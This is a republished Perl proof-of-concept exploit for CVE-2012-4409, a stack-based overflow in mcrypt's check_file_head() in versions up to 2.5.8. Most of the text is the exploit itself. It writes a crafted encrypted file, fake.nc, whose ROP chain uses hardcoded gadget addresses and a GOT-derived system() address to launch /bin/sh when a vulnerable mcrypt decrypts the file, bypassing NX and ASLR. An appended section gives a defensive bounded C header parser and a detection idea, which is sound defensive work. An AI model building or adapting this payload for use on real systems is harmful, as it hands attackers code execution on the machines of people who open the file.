mcrypt <= 2.5.8 STACK based overflow Vulnerability
Source: vfocus.net  Author: Tosh  Published: 2012-11-26
#!/usr/bin/perl

# Title          : mcrypt <= 2.5.8 STACK based overflow
# Date           : 23/11/2012
# Exploit Author : Tosh
# CVE            : CVE-2012-4409 
# Patch          : http://www.openwall.com/lists/oss-security/2012/09/06/8
# Tested on      : Archlinux 3.6.6-1, without SSP


# This script exploits a stack-based overflow in mcrypt <= 2.5.8.
# It bypasses NX and ASLR, but not SSP.

# This exploit crafts an encrypted file; arbitrary code may be executed if the file is decrypted with a vulnerable version
# of mcrypt. The vulnerable function is check_file_head(), in src/extra.c. See the CVE details or the patch for more
# information.

# The payload must be adjusted for other platforms; this is just a proof of concept :)

use strict;
use warnings;

my $filename = 'fake.nc';

my $file;
my $payload;

print "[+] Build payload.\n";
$payload = payload();

print "[+] Build file.\n";
$file = build_file($payload);

print "[+] Writing $filename.\n";
write_file();

print "[+] DONE.\n";

sub write_file {
    die("[-] Can't open $filename : $!\n") unless(open F, '>', $filename);
    print F $file;
    close F;
}

sub build_file {
# magic 
    $file .= "\x00m\x03";

# flags
    $file .= pack('C', 1 << 6);

# algorithm
    $file .= "H\@Ck3d\x00";

# keysize
    $file .= pack('S', 0xdead);

# mode
    $file .= "h\@cK3d\x00";

# keymode
    $file .= "H\@CK3D\x00";

# sflags
    $file .= "\xff";

# payload
    $file .= $_[0];

    return $file;
}

sub payload {
    my $saved_eip_off = 0x71;         # Buffer length needed to overwrite the saved EIP
    my $v_local_1 = 0x0805b000;       # Local variable 1 (overwritten)
    my $v_local_2 = 0x08048007;       # Local variable 2 (overwritten)
    my $ret_sled = 5;                 # Offset between saved EIP and local variables
    my $strcpy_plt = 0x080499f0;      # strcpy@plt address
    my $fopen64_got = 0x0805b1c8;     # fopen64 GOT entry
    my $system_off = 0xfffd6b30;      # fopen64 - system
    my $w_mem = 0x0805b000;           # writable memory, without ASLR
    my $pop2_ret = 0x08055a63;        # pop; pop; ret
    my $ret = 0x0805a5ed;             # ret
    my $pop_ebx = 0x08056186;         # pop ebx; ret
    my $pop_edi = 0x08053460;         # pop edi; ret
    my $xchg_eax = 0x080517a4;        # xchg eax, edi; ret
    my $add_eax = 0x0804dabf;         # add eax,[ebx-0x2776e73c]; pop ebx; ret
    my $call_eax = 0x0804b357;        # call eax; leave; ret

    my $payload;

    $payload .= "A" x $saved_eip_off;
    $payload .= pack('L', $ret) x $ret_sled;
    $payload .= pack('L', $pop2_ret);
    $payload .= pack('L', $v_local_1);
    $payload .= pack('L', $v_local_2);

    # Copy "/bin/" into +W memory
    $payload .= pack('L', $strcpy_plt);
    $payload .= pack('L', $pop2_ret);
    $payload .= pack('L', $w_mem + 0x00);
    $payload .= pack('L', 0x08057fc2);

    # Copy "sh" + "\x00" into +W memory
    $payload .= pack('L', $strcpy_plt);
    $payload .= pack('L', $pop2_ret);
    $payload .= pack('L', $w_mem + 0x05);
    $payload .= pack('L', 0x08048bab);

    # Compute the system() address from the fopen64 GOT entry
    $payload .= pack('L', $pop_ebx);
    $payload .= pack('L', $fopen64_got + 0x2776e73c);
    $payload .= pack('L', $pop_edi);
    $payload .= pack('L', $system_off);
    $payload .= pack('L', $xchg_eax);
    $payload .= pack('L', $add_eax);
    $payload .= "HaCk";               # filler for the trailing "pop ebx"

    # Call system("/bin/sh")
    $payload .= pack('L', $call_eax);
    $payload .= pack('L', $w_mem);

    die("[-] Payload too long!\n") if (length $payload > 0xfe);

    return $payload;
}
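Added here as a defender's counterpart, not part of the original PoC or of mcrypt's own sources: a bounded C parser for the header layout that build_file() emits above (magic, flags, algorithm, keysize, mode, keymode, sflags, then payload). It rejects over-long or unterminated fields instead of copying them into fixed-size stack buffers, which is the class of defect the PoC targets in check_file_head(); NC_NAME_MAX and the struct are assumptions for this example, not mcrypt's real limits.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define NC_NAME_MAX 32   /* assumed field size for this example, not mcrypt's */

struct nc_header {
    uint8_t  flags, sflags;
    uint16_t keysize;
    char     algorithm[NC_NAME_MAX], mode[NC_NAME_MAX], keymode[NC_NAME_MAX];
    size_t   header_len;           /* bytes consumed; the payload starts here */
};

/* Copy a NUL-terminated name from the file into a fixed-size field.
 * Unlike a plain strcpy(), this refuses a name that would not fit in dst
 * (the missing bound behind a header-parsing overflow) and a name that never ends. */
static int read_name(const uint8_t *buf, size_t len, size_t *pos,
                     char *dst, size_t dst_size)
{
    size_t start = *pos, n = 0;
    while (start + n < len && buf[start + n] != '\0')
        if (++n >= dst_size) return -1;   /* no room for the terminator */
    if (start + n >= len) return -1;      /* ran off the end of the file */
    memcpy(dst, buf + start, n + 1);
    *pos = start + n + 1;
    return 0;
}

/* Parse the header in the order build_file() emits it.
 * Returns 0 on success, -1 for a truncated, malformed or over-long field. */
int parse_nc_header(const uint8_t *buf, size_t len, struct nc_header *h)
{
    size_t pos = 4;
    if (len < 4 || memcmp(buf, "\x00m\x03", 3) != 0) return -1;  /* magic */
    h->flags = buf[3];
    if (read_name(buf, len, &pos, h->algorithm, sizeof h->algorithm)) return -1;
    if (pos + 2 > len) return -1;
    h->keysize = (uint16_t)(buf[pos] | (buf[pos + 1] << 8));  /* pack('S'), x86 LE */
    pos += 2;
    if (read_name(buf, len, &pos, h->mode, sizeof h->mode) ||
        read_name(buf, len, &pos, h->keymode, sizeof h->keymode)) return -1;
    if (pos >= len) return -1;
    h->sflags = buf[pos++];
    h->header_len = pos;
    return 0;
}
```

A detection rule built on the same walk (flag any file whose name fields exceed the expected size or lack a terminator before the sflags byte) catches a crafted fake.nc before it ever reaches a decryptor.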

 